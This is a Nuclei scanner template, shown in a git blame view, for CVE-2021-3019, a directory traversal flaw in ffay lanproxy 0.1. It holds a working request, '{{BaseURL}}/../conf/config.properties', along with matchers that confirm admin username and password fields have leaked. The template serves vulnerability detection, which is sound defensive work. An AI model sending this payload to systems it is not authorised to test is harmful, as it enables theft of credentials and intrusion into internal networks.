nuclei-templates/http/cves/2021/CVE-2021-3019.yaml

55 lines
1.8 KiB
YAML
Raw Normal View History

2021-01-30 12:22:35 +00:00
id: CVE-2021-3019
info:
name: ffay lanproxy Directory Traversal
2021-01-30 12:22:35 +00:00
author: pikpikcu
severity: high
description: ffay lanproxy 0.1 is susceptible to a directory traversal vulnerability that could let attackers read /../conf/config.properties to obtain credentials for a connection to the intranet.
2023-09-27 15:51:13 +00:00
impact: |
This vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution.
2023-09-06 12:09:01 +00:00
remediation: |
Apply the latest patch or upgrade to a version that has fixed the vulnerability.
reference:
2021-03-24 06:48:11 +00:00
- https://github.com/ffay/lanproxy/commits/master
- https://github.com/maybe-why-not/lanproxy/issues/1
- https://nvd.nist.gov/vuln/detail/CVE-2021-3019
- https://github.com/manas3c/CVE-POC
- https://github.com/sobinge/nuclei-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-3019
cwe-id: CWE-22
2024-05-31 19:23:20 +00:00
epss-score: 0.01119
epss-percentile: 0.84553
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:lanproxy_project:lanproxy:0.1:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: lanproxy_project
product: lanproxy
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,lanproxy,lfi,lanproxy_project
2021-01-30 12:22:35 +00:00
http:
2021-01-30 12:22:35 +00:00
- method: GET
path:
- "{{BaseURL}}/../conf/config.properties"
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: header
2021-01-30 12:22:35 +00:00
words:
- "application/octet-stream"
condition: and
2023-07-11 19:49:27 +00:00
2021-01-30 12:22:35 +00:00
- type: word
2023-07-11 19:49:27 +00:00
part: body
2021-01-30 12:22:35 +00:00
words:
- "config.admin.username"
- "config.admin.password"
condition: and
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 4a0a0047304502203ad9daab5f4af096dadceb3890f8babf529bd46030f99690d14439e8a1419880022100da156a23fb23c3bf8e4a73539790df0991e3ec348375300dd51c9f0a70ed980a:922c64590222798bb761d5b6d8e72950